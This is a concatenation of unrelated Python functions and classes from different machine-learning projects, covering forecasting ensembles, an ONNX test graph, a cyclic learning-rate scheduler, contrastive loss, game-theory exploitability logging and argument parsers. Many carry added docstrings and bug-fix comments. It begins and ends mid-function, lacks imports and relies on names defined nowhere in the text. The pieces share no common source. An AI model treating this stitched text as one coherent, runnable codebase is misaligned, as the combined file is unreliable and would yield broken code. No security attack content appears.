            ensemble_future_prediction = fit_and_predict_ensemble(df_mod, target_day=np.array([k]), outcome='hospitalizations', methods=[shared_exponential, linear], mode='predict_future', verbose=False, weight_c0=c0, weight_mu=mu)[('predicted_hospitalizations_ensemble_' + str(k))].values[0][0]
            ensemble.append(ensemble_future_prediction)
        # The separate-model fitters expect a (1, n_days) row vector.
        tmp = tmp.reshape(1, tmp.shape[0])
        lin_pred_future = linear_fit(tmp, 'predict_future', target_day=np.array([k]))
        lin_future_predictions.append(lin_pred_future[0][0])
        sep_exp_pred_future = exponential_fit(tmp, 'predict_future', target_day=np.array([k]))
        sep_exp_future_predictions.append(sep_exp_pred_future[0][0])
    return [np.array(lin_future_predictions), np.array(sep_exp_future_predictions), np.array(shared_exp_future_predictions), np.array(ensemble)]
def build_ox_model2():
    """Build a small ONNX test model computing H = (A @ B + E) + F.

    B and E are initializers sharing the same random 0/1 values; A and F are
    graph inputs. Uses opset 13.

    Returns:
        The onnx ModelProto.
    """
    A = helper.make_tensor_value_info('A', TensorProto.FLOAT, [1, 5, 5])
    H = helper.make_tensor_value_info('H', TensorProto.FLOAT, [1, 5, 2])
    F = helper.make_tensor_value_info('F', TensorProto.FLOAT, [1, 5, 2])
    # (Removed unused value infos: D is an internal tensor, not a graph I/O.)
    e_value = np.random.randint(2, size=10).astype(np.float32)
    B_init = helper.make_tensor('B', TensorProto.FLOAT, [5, 2], e_value.reshape(10).tolist())
    E_init = helper.make_tensor('E', TensorProto.FLOAT, [1, 5, 2], e_value.reshape(10).tolist())
    matmul_node = onnx.helper.make_node('MatMul', ['A', 'B'], ['C'], name='Matmul')
    add = onnx.helper.make_node('Add', ['C', 'E'], ['D'], name='add')
    add2 = onnx.helper.make_node('Add', ['D', 'F'], ['H'], name='add2')
    graph = helper.make_graph([matmul_node, add, add2], 'test_graph_1', [A, F], [H], [B_init, E_init])
    # Bug fix: the model was previously built twice, with the first
    # helper.make_model(graph) result immediately discarded.
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    return model
class Classifier(object):
    """Sequential stack of discriminator layers.

    Collects every layer's parameters into a flat ``params`` list and
    applies the layers in order via ``encode``.
    """

    def __init__(self, D_layers):
        self.D_layers = D_layers
        # Flatten all trainable parameters across the layers.
        self.params = [p for layer in self.D_layers for p in layer.params]

    def encode(self, input):
        """Run *input* through every layer in order and return the result."""
        encoded = input
        for layer in self.D_layers:
            encoded = layer.encode(encoded)
        return encoded

    def get_name(self):
        """Identifier used for naming/logging."""
        return 'classifier'
class CyclicLR(_LRScheduler):
    """Cyclical learning-rate scheduler.

    The learning rate oscillates between ``base_lr`` and ``max_lr`` over a
    cycle of ``step_size_up + step_size_down`` iterations, with the cycle
    amplitude scaled by ``scale_fn`` either per cycle or per iteration.
    When ``cycle_momentum`` is enabled, each param group's momentum cycles
    inversely (high when the LR is low and vice versa).
    """

    def __init__(self, optimizer, base_lr, max_lr, step_size_up=2000, step_size_down=None, mode='triangular', gamma=1.0, scale_fn=None, scale_mode='cycle', cycle_momentum=True, base_momentum=0.8, max_momentum=0.9, last_epoch=(- 1)):
        """Configure the cyclic schedule.

        Args:
            optimizer: wrapped optimizer; must have a 'momentum' default
                when ``cycle_momentum`` is True.
            base_lr, max_lr: scalar or per-param-group LR bounds.
            step_size_up: iterations in the rising half of the cycle.
            step_size_down: iterations in the falling half; defaults to
                ``step_size_up``.
            mode: 'triangular' | 'triangular2' | 'exp_range'; ignored when
                ``scale_fn`` is provided.
            gamma: decay base used by the 'exp_range' mode.
            scale_fn: custom amplitude-scaling function; overrides ``mode``.
            scale_mode: apply ``scale_fn`` per 'cycle' or per 'iterations'.
            cycle_momentum: also cycle momentum between base and max values.
            base_momentum, max_momentum: scalar or per-group momentum bounds.
            last_epoch: index of the last iteration; -1 for a fresh start.

        Raises:
            ValueError: on an invalid ``mode`` with no ``scale_fn``, or if
                momentum cycling is requested but unsupported.
        """
        self.optimizer = optimizer
        base_lrs = self._format_param('base_lr', optimizer, base_lr)
        # On a fresh run, seed every param group's lr at its base value.
        if (last_epoch == (- 1)):
            for (lr, group) in zip(base_lrs, optimizer.param_groups):
                group['lr'] = lr
        self.max_lrs = self._format_param('max_lr', optimizer, max_lr)
        step_size_up = float(step_size_up)
        step_size_down = (float(step_size_down) if (step_size_down is not None) else step_size_up)
        self.total_size = (step_size_up + step_size_down)
        # Fraction of the cycle spent rising.
        self.step_ratio = (step_size_up / self.total_size)
        if ((mode not in ['triangular', 'triangular2', 'exp_range']) and (scale_fn is None)):
            raise ValueError('mode is invalid and scale_fn is None')
        self.mode = mode
        self.gamma = gamma
        # A user-supplied scale_fn takes precedence over the built-in modes.
        if (scale_fn is None):
            if (self.mode == 'triangular'):
                self.scale_fn = self._triangular_scale_fn
                self.scale_mode = 'cycle'
            elif (self.mode == 'triangular2'):
                self.scale_fn = self._triangular2_scale_fn
                self.scale_mode = 'cycle'
            elif (self.mode == 'exp_range'):
                self.scale_fn = self._exp_range_scale_fn
                self.scale_mode = 'iterations'
        else:
            self.scale_fn = scale_fn
            self.scale_mode = scale_mode
        self.cycle_momentum = cycle_momentum
        if cycle_momentum:
            if ('momentum' not in optimizer.defaults):
                raise ValueError('optimizer must support momentum with `cycle_momentum` option enabled')
            base_momentums = self._format_param('base_momentum', optimizer, base_momentum)
            if (last_epoch == (- 1)):
                for (momentum, group) in zip(base_momentums, optimizer.param_groups):
                    group['momentum'] = momentum
            self.base_momentums = list(map((lambda group: group['momentum']), optimizer.param_groups))
            self.max_momentums = self._format_param('max_momentum', optimizer, max_momentum)
        # NOTE: must come last — the base __init__ may invoke get_lr(), which
        # reads the attributes set above.
        super(CyclicLR, self).__init__(optimizer, last_epoch)

    def _format_param(self, name, optimizer, param):
        """Expand ``param`` to one value per param group, validating length."""
        if isinstance(param, (list, tuple)):
            if (len(param) != len(optimizer.param_groups)):
                raise ValueError('expected {} values for {}, got {}'.format(len(optimizer.param_groups), name, len(param)))
            return param
        else:
            return ([param] * len(optimizer.param_groups))

    def _triangular_scale_fn(self, x):
        # Constant amplitude every cycle.
        return 1.0

    def _triangular2_scale_fn(self, x):
        # Halve the amplitude each cycle.
        return (1 / (2.0 ** (x - 1)))

    def _exp_range_scale_fn(self, x):
        # Exponential decay by gamma per unit of x.
        return (self.gamma ** x)

    def get_lr(self):
        """Compute the per-group learning rate for the current ``last_epoch``.

        Side effect: when ``cycle_momentum`` is enabled, also writes the
        cycled momentum into each optimizer param group.
        """
        # 1-based cycle count and position x in [0, 1) within the cycle.
        cycle = math.floor((1 + (self.last_epoch / self.total_size)))
        x = ((1.0 + (self.last_epoch / self.total_size)) - cycle)
        if (x <= self.step_ratio):
            # Rising half: scale from 0 to 1.
            scale_factor = (x / self.step_ratio)
        else:
            # Falling half: scale from 1 back to 0.
            scale_factor = ((x - 1) / (self.step_ratio - 1))
        lrs = []
        for (base_lr, max_lr) in zip(self.base_lrs, self.max_lrs):
            base_height = ((max_lr - base_lr) * scale_factor)
            if (self.scale_mode == 'cycle'):
                lr = (base_lr + (base_height * self.scale_fn(cycle)))
            else:
                lr = (base_lr + (base_height * self.scale_fn(self.last_epoch)))
            lrs.append(lr)
        if self.cycle_momentum:
            # Momentum moves opposite to the LR within the cycle.
            momentums = []
            for (base_momentum, max_momentum) in zip(self.base_momentums, self.max_momentums):
                base_height = ((max_momentum - base_momentum) * scale_factor)
                if (self.scale_mode == 'cycle'):
                    momentum = (max_momentum - (base_height * self.scale_fn(cycle)))
                else:
                    momentum = (max_momentum - (base_height * self.scale_fn(self.last_epoch)))
                momentums.append(momentum)
            for (param_group, momentum) in zip(self.optimizer.param_groups, momentums):
                param_group['momentum'] = momentum
        return lrs
def main():
    """Launch the Open3D GUI application showing a demo ICP point cloud."""
    application = gui.Application.instance
    application.initialize()
    demo_data = o3d.data.DemoICPPointClouds()
    point_cloud = o3d.io.read_point_cloud(demo_data.paths[0])
    # Keep a reference to the window/app object alive while the loop runs.
    viewer = ExampleApp(point_cloud)
    application.run()
def unique(results):
    """Return the fraction of non-duplicate entries across all result lists.

    Duplicates are counted within each sequence independently (via set()).

    Args:
        results: iterable of hashable-element sequences.

    Returns:
        float in [0, 1]; 1.0 means no duplicates (including empty input).
    """
    total_dupes = 0
    total = 0
    for res in results:
        original_num = len(res)
        total_dupes += (original_num - len(set(res)))
        total += original_num
    if total == 0:
        # Robustness fix: empty input previously raised ZeroDivisionError.
        return 1.0
    return (1 - (total_dupes / float(total)))
def parse_guidance_query(query):
    """Convert a guidance-template query into a list of chat messages.

    Finds the earliest role opener ({{#system~}}, {{#assistant~}},
    {{#user~}}), extracts the text up to the matching closer as one message,
    then recurses on the remainder of the query.

    Returns:
        list of {'role': ..., 'content': ...} dicts, in document order.
    """
    messages = []
    openers = ['{{#system~}}', '{{#assistant~}}', '{{#user~}}']
    closer_for = {'{{#system~}}': '{{~/system}}', '{{#assistant~}}': '{{~/assistant}}', '{{#user~}}': '{{~/user}}'}
    role_for = {'{{#system~}}': 'system', '{{#assistant~}}': 'assistant', '{{#user~}}': 'user'}
    # Locate the earliest opener present in the query.
    position = -1
    next_token = None
    for token in openers:
        found_at = query.find(token)
        if found_at != -1 and (position == -1 or found_at < position):
            position = found_at
            next_token = token
    if next_token is not None:
        end_pos = query.find(closer_for[next_token])
        content = query[position + len(next_token):end_pos].strip()
        messages.append({'role': role_for[next_token], 'content': content})
        # Recurse on the rest only if enough text remains to hold a tag.
        if len(query[end_pos:]) > 15:
            messages.extend(parse_guidance_query(query[end_pos:]))
    return messages
def output_ranklist(img_results, img_infos, out_file):
    """Attach file names to per-image results, sort by hmean ascending, and
    dump the ranked list to a JSON file.

    Args:
        img_results: list of per-image metric dicts (each with 'hmean').
        img_infos: list of image info dicts aligned with img_results.
        out_file: output path; must end with 'json'.

    Returns:
        The sorted list of (mutated) result dicts.
    """
    assert utils.is_type_list(img_results, dict)
    assert utils.is_type_list(img_infos, dict)
    assert isinstance(out_file, str)
    assert out_file.endswith('json')
    ranked = []
    for idx, result in enumerate(img_results):
        # Mutates the result dict in place, matching by position.
        result['file_name'] = img_infos[idx]['file_name']
        ranked.append(result)
    ranked = sorted(ranked, key=itemgetter('hmean'), reverse=False)
    mmcv.dump(ranked, file=out_file)
    return ranked
def load_adaptive_records(path, algo):
    """Load JSONL result records for *algo* from every subdirectory of *path*.

    Subdirectories without a results file are skipped silently (runs may be
    incomplete).

    Returns:
        Q-wrapped list of parsed record dicts.
    """
    records = []
    # os.listdir already returns a list, so tqdm knows the total.
    for subdir in tqdm.tqdm(os.listdir(path), ncols=80, leave=False):
        results_path = os.path.join(path, subdir, 'results_{}.jsonl'.format(algo))
        try:
            with open(results_path, 'r') as f:
                for line in f:
                    # Bug fix: `line[:-1]` chopped the final character, which
                    # corrupts the last record when the file has no trailing
                    # newline; json.loads tolerates the newline itself.
                    records.append(json.loads(line))
        except IOError:
            pass
    return Q(records)
class TqdmProgressFileReader():
    """Report read progress on a file object through a tqdm bar.

    Monkey-patches ``f.read`` so that every read advances the bar by the
    requested byte count; ``close()`` undoes the patch and closes the bar.
    """

    def __init__(self, f: io.BufferedReader):
        self.f = f
        self.total_size = os.fstat(f.fileno()).st_size
        self.pbar = tqdm(total=self.total_size, leave=False)
        # Keep the original bound read so we can delegate and later restore.
        self.read = f.read
        f.read = self._read

    def _read(self, n=(- 1)):
        # NOTE(review): advances by the *requested* size n, not the bytes
        # actually returned (and by -1 for read-to-end) — confirm this is
        # acceptable for the progress display.
        self.pbar.update(n)
        return self.read(n)

    def close(self):
        # Bug fix: restore the original read so the patched file object no
        # longer references this (now closed) reader after close().
        self.f.read = self.read
        self.pbar.close()
class ApproxExploitabilityP2SROManagerLogger(SimpleP2SROManagerLogger):
    """P2SRO manager logger that also records approximate exploitability.

    On every completed generation (both players' newest active policies moved
    to fixed) it appends the mean best-response reward of the newly fixed
    policies ("approx exploitability"), cumulative training timestep/episode
    counts, and checkpoint paths, then rewrites
    ``approx_exploitability_stats.json`` under ``log_dir``.
    """
    def __init__(self, p2sro_manger, log_dir: str, scenario: PSROScenario):
        # NOTE: "p2sro_manger" (sic) mirrors the parent-class keyword spelling.
        super(ApproxExploitabilityP2SROManagerLogger, self).__init__(p2sro_manger=p2sro_manger, log_dir=log_dir)
        self._scenario = scenario
        # Parallel per-generation series; all are appended in lockstep, one
        # entry per completed generation.
        self._exploitability_per_generation = []
        self._total_steps_per_generation = []
        self._total_episodes_per_generation = []
        self._num_policies_per_generation = []
        self._payoff_table_checkpoint_nums = []
        self._payoff_table_checkpoint_paths = []
        self._policy_nums_checkpoint_paths = []
        self._exploitability_stats_save_path = os.path.join(log_dir, 'approx_exploitability_stats.json')
        ensure_dir(self._exploitability_stats_save_path)
    def on_active_policy_moved_to_fixed(self, player: int, policy_num: int, fixed_policy_spec: StrategySpec):
        """Record generation stats once BOTH players have matching fixed-policy sets.

        The manager calls this each time a single player's policy becomes
        fixed; the method returns early until the other player of the same
        generation catches up, so stats are logged exactly once per generation.
        """
        current_checkpoint_num = self.get_current_checkpoint_num()
        super(ApproxExploitabilityP2SROManagerLogger, self).on_active_policy_moved_to_fixed(player=player, policy_num=policy_num, fixed_policy_spec=fixed_policy_spec)
        data = self._manager.get_copy_of_latest_data()
        (latest_payoff_table, active_policy_nums_per_player, fixed_policy_nums_per_player) = data
        # Need at least one fixed policy per player before any stats make sense.
        if ((len(fixed_policy_nums_per_player[0]) < 1) or (len(fixed_policy_nums_per_player[1]) < 1)):
            return
        # Only log when both players' fixed-policy sets match, i.e. the
        # generation is complete for both sides.
        if (not np.array_equal(fixed_policy_nums_per_player[0], fixed_policy_nums_per_player[1])):
            return
        n_policies = len(fixed_policy_nums_per_player[0])
        latest_policy_index = max(fixed_policy_nums_per_player[0])
        # Specs of the policy each player just added this generation.
        policy_spec_added_this_gen = [latest_payoff_table.get_spec_for_player_and_pure_strat_index(player=p, pure_strat_index=(n_policies - 1)) for p in range(2)]
        # Approximate exploitability = mean of both players' best-response rewards.
        exploitability_this_gen = np.mean([policy_spec_added_this_gen[p].metadata['average_br_reward'] for p in range(2)])
        logger.info(f'{n_policies} policies, {exploitability_this_gen} approx exploitability')
        latest_policy_steps = sum((policy_spec_added_this_gen[p].metadata['timesteps_training_br'] for p in range(2)))
        latest_policy_episodes = sum((policy_spec_added_this_gen[p].metadata['episodes_training_br'] for p in range(2)))
        # Accumulate running totals on top of the previous generation, if any.
        if (latest_policy_index > 0):
            total_steps_this_generation = (latest_policy_steps + self._total_steps_per_generation[(latest_policy_index - 1)])
            total_episodes_this_generation = (latest_policy_episodes + self._total_episodes_per_generation[(latest_policy_index - 1)])
        else:
            total_steps_this_generation = latest_policy_steps
            total_episodes_this_generation = latest_policy_episodes
        self._exploitability_per_generation.append(exploitability_this_gen)
        self._total_steps_per_generation.append(total_steps_this_generation)
        self._total_episodes_per_generation.append(total_episodes_this_generation)
        self._num_policies_per_generation.append(n_policies)
        self._payoff_table_checkpoint_nums.append(current_checkpoint_num)
        self._payoff_table_checkpoint_paths.append(self.get_latest_numbered_payoff_table_checkpoint_path())
        self._policy_nums_checkpoint_paths.append(self.get_latest_numbered_policy_nums_path())
        stats_out = {'num_policies': self._num_policies_per_generation, 'approx_exploitability': self._exploitability_per_generation, 'timesteps': self._total_steps_per_generation, 'episodes': self._total_episodes_per_generation, 'payoff_table_checkpoint_num': self._payoff_table_checkpoint_nums, 'payoff_table_checkpoint_path': self._payoff_table_checkpoint_paths, 'policy_nums_checkpoint_path': self._policy_nums_checkpoint_paths}
        # '+w' is equivalent to 'w+': truncate and rewrite the full stats file
        # each generation so the JSON is always the complete history.
        with open(self._exploitability_stats_save_path, '+w') as json_file:
            json.dump(stats_out, json_file)
        logger.info(colored(f'(Graph this in a notebook) Saved approx exploitability stats to {self._exploitability_stats_save_path}', 'green'))
def get_diapreresnet_cifar(num_classes, blocks, bottleneck, model_name=None, pretrained=False, root=os.path.join('~', '.torch', 'models'), **kwargs):
    """Build a DIA-PreResNet model for CIFAR-10/100.

    Args:
        num_classes: Number of classes; must be 10 or 100.
        blocks: Total network depth in layers (e.g. 20, 56, 110).
        bottleneck: Whether stages use bottleneck units (9 layers each)
            instead of basic units (6 layers each).
        model_name: Pretrained weight identifier; required if ``pretrained``.
        pretrained: Download and load pretrained weights when True.
        root: Local directory for the pretrained model store.
        **kwargs: Forwarded to ``CIFARDIAPreResNet``.

    Returns:
        The constructed ``CIFARDIAPreResNet`` network.
    """
    assert (num_classes in [10, 100])
    # Each of the 3 stages has the same number of units; a bottleneck unit
    # contributes 9 layers to the depth, a basic unit 6.
    layers_per_unit = 9 if bottleneck else 6
    assert ((blocks - 2) % layers_per_unit) == 0
    layers = [(blocks - 2) // layers_per_unit] * 3
    init_block_channels = 16
    # Stage widths 16/32/64, repeated per unit; bottleneck expands 4x.
    channels = [[width] * depth for width, depth in zip([16, 32, 64], layers)]
    if bottleneck:
        channels = [[4 * width for width in stage] for stage in channels]
    net = CIFARDIAPreResNet(channels=channels, init_block_channels=init_block_channels, bottleneck=bottleneck, num_classes=num_classes, **kwargs)
    if pretrained:
        # ``not model_name`` covers both None and the empty string.
        if not model_name:
            raise ValueError('Parameter `model_name` should be properly initialized for loading pretrained model.')
        from .model_store import download_model
        download_model(net=net, model_name=model_name, local_model_store_dir_path=root)
    return net
def check_has_downloaded():
    """Check whether the iPER dataset has been fully downloaded and extracted.

    Requires both split files (train/val txt) to exist and every listed video
    directory under ``iPER_images_dir`` to be present and non-empty.

    Returns:
        True if everything is in place, False otherwise.
    """
    global iPER_images_dir, iPER_train_txt, iPER_val_txt
    # Both split description files must exist before anything else.
    if not (os.path.exists(iPER_train_txt) and os.path.exists(iPER_val_txt)):
        return False
    for vid_name in get_video_dirs(iPER_train_txt) + get_video_dirs(iPER_val_txt):
        vid_path = os.path.join(iPER_images_dir, vid_name)
        print(vid_path)
        # A missing or empty frame directory means the download is incomplete.
        if not os.path.exists(vid_path) or len(os.listdir(vid_path)) == 0:
            return False
    return True
class TFRobertaPreLayerNormForSequenceClassification(metaclass=DummyObject):
    """Import placeholder raising a helpful error when TensorFlow is missing.

    Auto-generated dummy object: instantiating it (or accessing it through
    the ``DummyObject`` metaclass) calls ``requires_backends``, which raises
    an ImportError telling the user to install the 'tf' backend.
    """
    # Backends that must be installed for the real class to be importable.
    _backends = ['tf']
    def __init__(self, *args, **kwargs):
        requires_backends(self, ['tf'])
class DumbSpotVideo(Video):
    """Synthetic Video stand-in that serves random frames of the declared size.

    Useful for testing/benchmarking pipelines without decoding real video:
    ``get_clip`` returns random (3, T, 224, 224) tensors for the requested
    frame range, optionally padded to a minimum clip duration.
    """
    def __init__(self, video_path: (str | Path), fps: int, num_frames: int, num_decode: int=1, min_clip_duration: float=0, **kwargs) -> None:
        self._fps = fps
        self._num_frames = num_frames
        self._video_path = video_path
        # BUG FIX: the original built the name from ``self._half_path``, an
        # attribute that is never assigned anywhere in this class, so every
        # construction raised AttributeError. Use the video file's basename.
        # NOTE(review): if callers expect a "<video>/<half>" compound name
        # (as in a sibling Video subclass), restore that component here.
        self._name = Path(Path(self._video_path).name)
        self._num_decode = num_decode
        self._min_clip_duration = min_clip_duration
    def name(self) -> str:
        """Return the clip name derived from the video path."""
        return self._name
    def get_frame_indices(self, start_frame: float, end_frame: float) -> tuple[(torch.Tensor, torch.Tensor)]:
        """Return a 1-D tensor of frame indices in [start_frame, end_frame].

        Pads the range up to ``min_clip_duration`` seconds worth of frames
        (repeating the first or last frame). Returns None and logs a warning
        when the requested range is outside the video.
        """
        if ((start_frame < 0) or (start_frame >= self._num_frames) or (end_frame >= self._num_frames)):
            logger.warning(f'No frames found within {start_frame} and {end_frame} frames. Video startsat frame 0 and ends at {self._num_frames}.')
            return None
        video_frame_indices = torch.arange(start_frame, (end_frame + 1))
        if self._min_clip_duration > 0:
            # BUG FIX: the original compared the frame count against the
            # duration in *seconds* (``len < min_clip_duration``) while the
            # pad amount used seconds * fps; compare against frames instead.
            # int() also guards torch.zeros against a float size.
            min_frames = int(self._min_clip_duration * self._fps)
            if len(video_frame_indices) < min_frames:
                num_lacking_frames = min_frames - len(video_frame_indices)
                if (start_frame == 0):
                    # Clip starts at the video start: pad the front with frame 0.
                    video_frame_indices = torch.cat([torch.zeros(num_lacking_frames, dtype=video_frame_indices.dtype), video_frame_indices])
                else:
                    # Otherwise pad the back by repeating the last frame.
                    video_frame_indices = torch.cat([video_frame_indices, torch.tensor([video_frame_indices[(- 1)] for _ in range(num_lacking_frames)], dtype=video_frame_indices.dtype)])
        return video_frame_indices
    def get_clip(self, start_frame: int, end_frame: int) -> dict[(str, ((torch.Tensor | None) | list[torch.Tensor]))]:
        """Return a dict with random clip tensor(s) for the requested range.

        Returns None when the frame range is invalid.
        """
        frame_indices = self.get_frame_indices(start_frame, end_frame)
        # BUG FIX: get_frame_indices returns None for out-of-range requests;
        # the original then crashed on ``frame_indices.shape``.
        if frame_indices is None:
            return None
        videos = torch.randn((3, frame_indices.shape[0], 224, 224), dtype=torch.float32)
        if (self._num_decode > 1):
            # Simulate multiple decode streams by repeating the same tensor.
            videos = [videos for _ in range(self._num_decode)]
        return {'video': videos, 'clip_start': frame_indices[0].item(), 'clip_end': frame_indices[(- 1)].item(), 'frame_indices': frame_indices}
def _str_to_bool(value):
    """Parse a CLI string into a bool (accepts yes/no, true/false, 1/0, t/f, y/n)."""
    if isinstance(value, bool):
        return value
    lowered = value.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError(f'Boolean value expected, got {value!r}.')


def parse_args():
    """Parse command-line arguments for summarization fine-tuning.

    Returns:
        argparse.Namespace of all options.

    Raises:
        ValueError: If neither a dataset name nor a train/validation file is given.
        AssertionError: If train/validation files are not csv/json, or
            ``--push_to_hub`` is passed without ``--output_dir``.
    """
    parser = argparse.ArgumentParser(description='Finetune a transformers model on a summarization task')
    parser.add_argument('--dataset_name', type=str, default=None, help='The name of the dataset to use (via the datasets library).')
    parser.add_argument('--dataset_config_name', type=str, default=None, help='The configuration name of the dataset to use (via the datasets library).')
    parser.add_argument('--train_file', type=str, default=None, help='A csv or a json file containing the training data.')
    parser.add_argument('--validation_file', type=str, default=None, help='A csv or a json file containing the validation data.')
    # BUG FIX: the original used type=bool, for which argparse passes the raw
    # string through bool() — so '--ignore_pad_token_for_loss False' evaluated
    # to True. _str_to_bool parses the string properly; default is unchanged.
    parser.add_argument('--ignore_pad_token_for_loss', type=_str_to_bool, default=True, help='Whether to ignore the tokens corresponding to padded labels in the loss computation or not.')
    parser.add_argument('--max_source_length', type=int, default=1024, help='The maximum total input sequence length after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded.')
    parser.add_argument('--source_prefix', type=str, default=None, help='A prefix to add before every source text (useful for T5 models).')
    parser.add_argument('--preprocessing_num_workers', type=int, default=None, help='The number of processes to use for the preprocessing.')
    parser.add_argument('--overwrite_cache', action='store_true', help='Overwrite the cached training and evaluation sets')
    parser.add_argument('--max_target_length', type=int, default=128, help='The maximum total sequence length for target text after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.during ``evaluate`` and ``predict``.')
    parser.add_argument('--val_max_target_length', type=int, default=None, help='The maximum total sequence length for validation target text after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`.This argument is also used to override the ``max_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
    parser.add_argument('--num_beams', type=int, default=None, help='Number of beams to use for evaluation. This argument will be passed to ``model.generate``, which is used during ``evaluate`` and ``predict``.')
    parser.add_argument('--pad_to_max_length', action='store_true', help='If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.')
    parser.add_argument('--model_name_or_path', type=str, help='Path to pretrained model or model identifier from huggingface.co/models.', required=False)
    parser.add_argument('--config_name', type=str, default=None, help='Pretrained config name or path if not the same as model_name')
    parser.add_argument('--tokenizer_name', type=str, default=None, help='Pretrained tokenizer name or path if not the same as model_name')
    parser.add_argument('--text_column', type=str, default=None, help='The name of the column in the datasets containing the full texts (for summarization).')
    parser.add_argument('--summary_column', type=str, default=None, help='The name of the column in the datasets containing the summaries (for summarization).')
    parser.add_argument('--use_slow_tokenizer', action='store_true', help='If passed, will use a slow tokenizer (not backed by the Tokenizers library).')
    parser.add_argument('--per_device_train_batch_size', type=int, default=8, help='Batch size (per device) for the training dataloader.')
    parser.add_argument('--per_device_eval_batch_size', type=int, default=8, help='Batch size (per device) for the evaluation dataloader.')
    parser.add_argument('--learning_rate', type=float, default=5e-05, help='Initial learning rate (after the potential warmup period) to use.')
    parser.add_argument('--weight_decay', type=float, default=0.0, help='Weight decay to use.')
    parser.add_argument('--num_train_epochs', type=int, default=3, help='Total number of training epochs to perform.')
    parser.add_argument('--max_train_steps', type=int, default=None, help='Total number of training steps to perform. If provided, overrides num_train_epochs.')
    parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='Number of updates steps to accumulate before performing a backward/update pass.')
    parser.add_argument('--lr_scheduler_type', type=SchedulerType, default='linear', help='The scheduler type to use.', choices=['linear', 'cosine', 'cosine_with_restarts', 'polynomial', 'constant', 'constant_with_warmup'])
    parser.add_argument('--num_warmup_steps', type=int, default=0, help='Number of steps for the warmup in the lr scheduler.')
    parser.add_argument('--output_dir', type=str, default=None, help='Where to store the final model.')
    parser.add_argument('--seed', type=int, default=None, help='A seed for reproducible training.')
    parser.add_argument('--model_type', type=str, default=None, help='Model type to use if training from scratch.', choices=MODEL_TYPES)
    parser.add_argument('--push_to_hub', action='store_true', help='Whether or not to push the model to the Hub.')
    parser.add_argument('--hub_model_id', type=str, help='The name of the repository to keep in sync with the local `output_dir`.')
    parser.add_argument('--hub_token', type=str, help='The token to use to push to the Model Hub.')
    parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
    parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
    parser.add_argument('--with_tracking', action='store_true', help='Whether to enable experiment trackers for logging.')
    parser.add_argument('--report_to', type=str, default='all', help='The integration to report the results and logs to. Supported platforms are `"tensorboard"`, `"wandb"`, `"comet_ml"` and `"clearml"`. Use `"all"` (default) to report to all integrations.Only applicable when `--with_tracking` is passed.')
    args = parser.parse_args()
    # Sanity-check the data source combination.
    if ((args.dataset_name is None) and (args.train_file is None) and (args.validation_file is None)):
        raise ValueError('Need either a dataset name or a training/validation file.')
    else:
        if (args.train_file is not None):
            extension = args.train_file.split('.')[(- 1)]
            assert (extension in ['csv', 'json']), '`train_file` should be a csv or a json file.'
        if (args.validation_file is not None):
            extension = args.validation_file.split('.')[(- 1)]
            assert (extension in ['csv', 'json']), '`validation_file` should be a csv or a json file.'
    if args.push_to_hub:
        assert (args.output_dir is not None), 'Need an `output_dir` to create a repo when `--push_to_hub` is passed.'
    return args
def maxpool(x, dim=-1, keepdim=False):
    """Max-reduce ``x`` along ``dim``, returning only the values (argmax indices discarded)."""
    reduced = x.max(dim=dim, keepdim=keepdim)
    return reduced.values
def compute_moco_loss(q: Tensor, k: Tensor, k_global: Tensor, use_keys: bool, queue: Tensor, temp: float=0.2, rank: int=0) -> Tensor:
    """MoCo-style InfoNCE contrastive loss.

    When ``use_keys`` is True, every key in ``k_global`` (all ranks' keys) is
    a candidate; the positive for query ``i`` sits at column
    ``i + batch_size * rank``, and the memory ``queue`` (dim x K), if given,
    appends extra negatives. Otherwise only the paired key ``k[i]`` is the
    positive (column 0) and the queue supplies all negatives.
    """
    batch_size = q.shape[0]
    if use_keys:
        # Similarity of each query against every gathered key: (N, M).
        key_logits = torch.einsum('nc,mc->nm', [q, k_global])
        if (queue is not None):
            queue_logits = torch.einsum('nc,ck->nk', [q, queue])
            sim = torch.cat([key_logits, queue_logits], dim=1)
        else:
            sim = key_logits
        # Positive index offsets into this rank's own key block.
        labels = (torch.arange(batch_size, dtype=torch.long, device=q.device) + (batch_size * rank))
    else:
        # Single positive per query in column 0; queue entries as negatives.
        pos_logits = torch.einsum('nc,nc->n', [q, k]).unsqueeze(-1)
        queue_logits = torch.einsum('nc,ck->nk', [q, queue])
        sim = torch.cat([pos_logits, queue_logits], dim=1)
        labels = torch.zeros(batch_size, dtype=torch.long, device=q.device)
    return nn.functional.cross_entropy(sim / temp, labels)
def get_options(args=None):
    """Build and post-process the AMDKD training configuration.

    Parses all CLI options (problem, architecture, distillation, training,
    logging), then derives dependent settings: CUDA visibility, validation
    dataset paths for multi-distribution testing, per-problem normalization,
    LKH3 reference optima for adaptive teacher selection, run/save
    directories, default teacher checkpoint paths, and baseline warmup.

    Args:
        args: Optional argument list; defaults to ``sys.argv[1:]``.

    Returns:
        argparse.Namespace with all raw and derived options.
    """
    parser = argparse.ArgumentParser(description='Adaptive Multi-Distribution Knowledge Distillation (AMDKD) scheme for AM')
    # Problem / data options.
    parser.add_argument('--problem', default='cvrp', help="The problem to solve, or 'tsp'")
    parser.add_argument('--graph_size', type=int, default=20, help='The size of the problem graph')
    parser.add_argument('--batch_size', type=int, default=512, help='Number of instances per batch during training')
    parser.add_argument('--epoch_size', type=int, default=128000, help='Number of instances per epoch during training')
    parser.add_argument('--val_size', type=int, default=10000, help='Number of instances used for reporting validation performance')
    parser.add_argument('--val_dataset', type=str, default=None, help='Dataset file to use for validation')
    parser.add_argument('--test_type', type=str, default='greedy', help='test type')
    # Teacher model architecture.
    parser.add_argument('--model', default='attention', help="Model, 'attention' (default) or 'pointer'")
    parser.add_argument('--embedding_dim', type=int, default=128, help='Dimension of input embedding')
    parser.add_argument('--hidden_dim', type=int, default=128, help='Dimension of hidden layers in Enc/Dec')
